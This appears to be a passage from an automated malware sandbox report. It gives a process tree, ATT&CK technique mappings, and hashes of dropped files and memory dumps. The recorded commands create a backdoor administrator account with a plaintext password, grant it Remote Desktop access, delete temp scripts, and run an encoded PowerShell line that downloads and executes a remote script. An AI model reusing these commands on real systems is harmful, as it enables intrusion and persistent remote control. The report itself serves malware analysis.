    PID:4388
  - - C:\Windows\system32\cmd.exe
      cmd /c net start TermService
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4108
    - - C:\Windows\system32\net.exe
        
        net start TermService
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:5068
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start TermService
        6⤵
        
        PID:1456
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    3⤵
    PID:4088
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
    3⤵
    PID:3256

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc Ghar4f5 /del
1⤵
- Suspicious use of WriteProcessMemory
PID:208
- C:\Windows\system32\net.exe
  net.exe user wgautilacc Ghar4f5 /del
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1836
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user wgautilacc Ghar4f5 /del
    3⤵
    PID:2248

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc KABMrz7h /add
1⤵
- Suspicious use of WriteProcessMemory
PID:4332
- C:\Windows\system32\net.exe
  net.exe user wgautilacc KABMrz7h /add
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4052
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user wgautilacc KABMrz7h /add
    3⤵
    PID:4412

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:784
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
  2⤵
  PID:4960
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
    3⤵
    PID:1880

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" QMWIRSIY$ /ADD
1⤵
PID:1120
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" QMWIRSIY$ /ADD
  2⤵
  PID:972
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" QMWIRSIY$ /ADD
    3⤵
    PID:1524

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD
1⤵
PID:4604
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Administrators" wgautilacc /ADD
  2⤵
  PID:1492
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD
    3⤵
    PID:3272

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc KABMrz7h
1⤵
PID:620
- C:\Windows\system32\net.exe
  net.exe user wgautilacc KABMrz7h
  2⤵
  PID:1488
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user wgautilacc KABMrz7h
    3⤵
    PID:5084

C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
1⤵
PID:4480
- C:\Windows\System32\Wbem\WMIC.exe
  wmic path win32_VideoController get name
  2⤵
  - Detects videocard installed
  - Suspicious use of AdjustPrivilegeToken
  PID:4512

C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
1⤵
PID:3644
- C:\Windows\System32\Wbem\WMIC.exe
  wmic CPU get NAME
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2588

C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
1⤵
PID:3080
- C:\Windows\system32\cmd.exe
  cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  2⤵
  PID:4124
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    3⤵
    - Blocklisted process makes network request
    - Drops file in Program Files directory
    - Drops file in Windows directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:396

C:\Windows\System32\sihclient.exe
C:\Windows\System32\sihclient.exe /cv xF60VN9nu0q95A05D5EK+Q.0.2
1⤵
PID:1492

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Remote Services

T1021

Remote Desktop Protocol

T1021.001

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES41DB.tmp

Filesize
1KB

MD5
c50df0a92d3303e86c1126685165936c

SHA1
78de1320d1634795536686a71d6228d942d5f18a

SHA256
4b0e04aacfe16959ff2bc9c23b12f8e11bea4ddf87fe84d74ab42aaa7afe8345

SHA512
c6b818a8b776ca69cef47a6a620fbe148a3093e97f7299397bcc0871f8d225ac67ed954aa4d7b4af54b2f61c745e5b4f59829942685fae73365568108589b925

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gz2e1sga.sb3.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\get-dnsprovider.PS1

Filesize
2.5MB

MD5
1ef6eef1d39c71661339d818226d688d

SHA1
b3e44163a9d9894d091f59f888d7d5d90e68e216

SHA256
dcad3e3226ea222782284a604f9354ac661cf6e34c26c62162dd1aeedfbef04a

SHA512
8deb2b6df79c2ce81604b9124d92c6222f517cea021416513fdd8dfc9f8d46ae464cd69f50ee70a343cfe5b4fbc4d08212bcf3e1416262193cae52b4a30b2c49

Download Submit
C:\Users\Admin\AppData\Local\Temp\m2r3sqkf\m2r3sqkf.dll

Filesize
3KB

MD5
2431bc142ed69e62ce20999d26de27dc

SHA1
2466b6db4c20b72b72acd29384a67ade7f1816bb

SHA256
2f02fceb847124d6c1b02df442e3e0ff924c2bbd20bb15c5807a7cd074a3a930

SHA512
8a46cbcc8918ecda7f5e7125ed7cd577b4950f5c51b78acc0eb0d8d0a6e3cb63a07a813c09a0fbd4fc23d7a4bbd1ea5c74c62ecedcf8250d1652a47eea1dfa2d

Download Submit
C:\Users\Admin\AppData\Local\Temp\ready.ps1

Filesize
1KB

MD5
28d9755addec05c0b24cca50dfe3a92b

SHA1
7d3156f11c7a7fb60d29809caf93101de2681aa3

SHA256
abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9

SHA512
891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42

Download Submit
C:\Windows\Branding\mediasrv.png

Filesize
60KB

MD5
44161e115bf968d5b616d254be2f38a1

SHA1
b801a9318b1fc89996f76055c69e071e0fed368a

SHA256
2750122708b726eb5e75869401dc6f3b663e8ca342924f8a713adfca86e80491

SHA512
375ab2fd36f9953faef09e10889535a0e8a5192c841d941998ff0f193d5b6702a26698149789f77925689c74edecb97a78382c2d2529c6ab10a47b723d3a185e

Download Submit
C:\Windows\Branding\mediasvc.png

Filesize
743KB

MD5
7245ed7533b89d29f7f5bb35830d4560

SHA1
8efaef0babf855989e460451803032940ae0c7bd

SHA256
89549afa855d70f7bf33b1979541ab0e732c7cc16adb866efffe9d1e8be62638

SHA512
f19a1a72684cc54757d065133dd95122acce69744267fa49a55a5508263946953ad8bca4e2e3188e02a119948dac95a63c185d92c57f32dad51bfaa077a216f3

Download Submit
C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI5F56.tmp

Filesize
24KB

MD5
d0e162c0bd0629323ebb1ed88df890d6

SHA1
cf3fd2652cdb6ff86d1df215977454390ed4d7bc

SHA256
3e6520cd56070637daa5c3d596e57e6b5e3bd1a25a08804ccea1ce4f50358744

SHA512
a9c82f1116fce7052d1c45984e87b8f3b9f9afeb16be558fd1ecbd54327350344f37f32bc5d4baabd3e1cf3ac0de75c8ba569c1e34aaf1094cd04641d137c117

Download Submit
C:\Windows\system32\rfxvmt.dll

Filesize
40KB

MD5
dc39d23e4c0e681fad7a3e1342a2843c

SHA1
58fd7d50c2dca464a128f5e0435d6f0515e62073

SHA256
6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9

SHA512
5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

Download Submit
\??\PIPE\lsarpc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\m2r3sqkf\CSCC7A1944EE5224208ACC824451F7EF9.TMP

Filesize
652B

MD5
0d7ba26f4ced006c766d0d960aabbc83

SHA1
c4327178e30559b799f440e00fe6dfc3a17659d1

SHA256
514071fb5c3947ae67e9eac48734f47d4b5f631bdf2fd1ab8ac4540f44af13e0

SHA512
aac18df0283f167048b41d9aa8972d912e2b182336841a2474d65d54c5ee9322730a2eaeeac6e8861d0a2ceb8f49f62ec86c006da34cb3a297718cd684f9e144

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\m2r3sqkf\m2r3sqkf.0.cs

Filesize
424B

MD5
9f8ab7eb0ab21443a2fe06dab341510e

SHA1
2b88b3116a79e48bab7114e18c9b9674e8a52165

SHA256
e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9

SHA512
53f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\m2r3sqkf\m2r3sqkf.cmdline

Filesize
369B

MD5
8ab455c3cba419c854e45b025117353f

SHA1
a9dae3cb9e0efb1214639127c8c38506958e1abb

SHA256
9e60ad5c5ab080396e8d7194ed37e433847f9b465c4d6e144f7d1a8c004bd672

SHA512
3322b60ed371d14f24a4d5fd34b8a5b81e1b7eca184825f0f1d5f0a3a122722c0b584ac291b7fb9fb62649f49e8c525146b74bfcea4f7f51aa6ca22a48496e29

Download Submit
memory/396-116-0x00007FF8ADDB0000-0x00007FF8AE871000-memory.dmp

Filesize
10.8MB

Download
memory/396-117-0x000001ABBD4F0000-0x000001ABBD500000-memory.dmp

Filesize
64KB

Download
memory/396-152-0x00007FF8ADDB0000-0x00007FF8AE871000-memory.dmp

Filesize
10.8MB

Download
memory/3068-1-0x00007FF8ADDB0000-0x00007FF8AE871000-memory.dmp

Filesize
10.8MB

Download
memory/3068-5-0x000001F771FC0000-0x000001F771FD0000-memory.dmp

Filesize
64KB

Download
memory/3068-80-0x000001F771FC0000-0x000001F771FD0000-memory.dmp

Filesize
64KB

Download
memory/3068-159-0x00007FF8ADDB0000-0x00007FF8AE871000-memory.dmp

Filesize
10.8MB

Download
memory/3068-0-0x000001F7723E0000-0x000001F7727E4000-memory.dmp

Filesize
4.0MB

Download
memory/3068-4-0x000001F771FC0000-0x000001F771FD0000-memory.dmp

Filesize
64KB

Download
memory/3068-3-0x000001F771FC0000-0x000001F771FD0000-memory.dmp

Filesize
64KB

Download
memory/3068-81-0x000001F771FC0000-0x000001F771FD0000-memory.dmp

Filesize
64KB

Download
memory/3068-79-0x000001F771FC0000-0x000001F771FD0000-memory.dmp

Filesize
64KB

Download
memory/3068-74-0x000001F771FC0000-0x000001F771FD0000-memory.dmp

Filesize
64KB

Download
memory/3068-2-0x000001F771FC0000-0x000001F771FD0000-memory.dmp

Filesize
64KB

Download
memory/3068-64-0x00007FF8ADDB0000-0x00007FF8AE871000-memory.dmp

Filesize
10.8MB

Download
memory/3112-65-0x000001826BFB0000-0x000001826BFC0000-memory.dmp

Filesize
64KB

Download
memory/3112-66-0x000001826BFB0000-0x000001826BFC0000-memory.dmp

Filesize
64KB

Download
memory/3112-63-0x00007FF8ADDB0000-0x00007FF8AE871000-memory.dmp

Filesize
10.8MB

Download
memory/3112-67-0x00007FF8ADDB0000-0x00007FF8AE871000-memory.dmp

Filesize
10.8MB

Download
memory/3272-53-0x00007FF8ADDB0000-0x00007FF8AE871000-memory.dmp

Filesize
10.8MB

Download
memory/3272-51-0x00007FF8ADDB0000-0x00007FF8AE871000-memory.dmp

Filesize
10.8MB

Download
memory/3272-52-0x0000024D73050000-0x0000024D73060000-memory.dmp

Filesize
64KB

Download
memory/4116-115-0x000001A2AAAE0000-0x000001A2AAAF0000-memory.dmp

Filesize
64KB

Download
memory/4116-11-0x00007FF8ADDB0000-0x00007FF8AE871000-memory.dmp

Filesize
10.8MB

Download
memory/4116-25-0x000001A2AAAE0000-0x000001A2AAAF0000-memory.dmp

Filesize
64KB

Download
memory/4116-84-0x00007FF8BC050000-0x00007FF8BC069000-memory.dmp

Filesize
100KB

Download
memory/4116-157-0x00007FF8ADDB0000-0x00007FF8AE871000-memory.dmp

Filesize
10.8MB

Download
memory/4116-41-0x000001A2ABE30000-0x000001A2AC03A000-memory.dmp

Filesize
2.0MB

Download
memory/4116-40-0x000001A2ABAA0000-0x000001A2ABC16000-memory.dmp

Filesize
1.5MB

Download
memory/4116-114-0x000001A2AAAE0000-0x000001A2AAAF0000-memory.dmp

Filesize
64KB

Download
memory/4116-39-0x000001A2AAAE0000-0x000001A2AAAF0000-memory.dmp

Filesize
64KB

Download
memory/4116-156-0x00007FF8BC050000-0x00007FF8BC069000-memory.dmp

Filesize
100KB

Download
memory/4116-10-0x000001A2AB470000-0x000001A2AB492000-memory.dmp

Filesize
136KB

Download
memory/4116-113-0x00007FF8ADDB0000-0x00007FF8AE871000-memory.dmp

Filesize
10.8MB

Download
memory/4116-20-0x000001A2AAAE0000-0x000001A2AAAF0000-memory.dmp

Filesize
64KB

Download
memory/4116-118-0x000001A2AAAE0000-0x000001A2AAAF0000-memory.dmp

Filesize
64KB

Download
memory/4116-36-0x000001A2AB440000-0x000001A2AB448000-memory.dmp

Filesize
32KB

Download
memory/4116-149-0x000001A2AAAE0000-0x000001A2AAAF0000-memory.dmp

Filesize
64KB

Download
memory/4116-21-0x000001A2AAAE0000-0x000001A2AAAF0000-memory.dmp

Filesize
64KB

Download
memory/4480-82-0x00000255C1000000-0x00000255C1010000-memory.dmp

Filesize
64KB

Download
memory/4480-68-0x00007FF8ADDB0000-0x00007FF8AE871000-memory.dmp

Filesize
10.8MB

Download
memory/4480-83-0x00007FF8ADDB0000-0x00007FF8AE871000-memory.dmp

Filesize
10.8MB

Download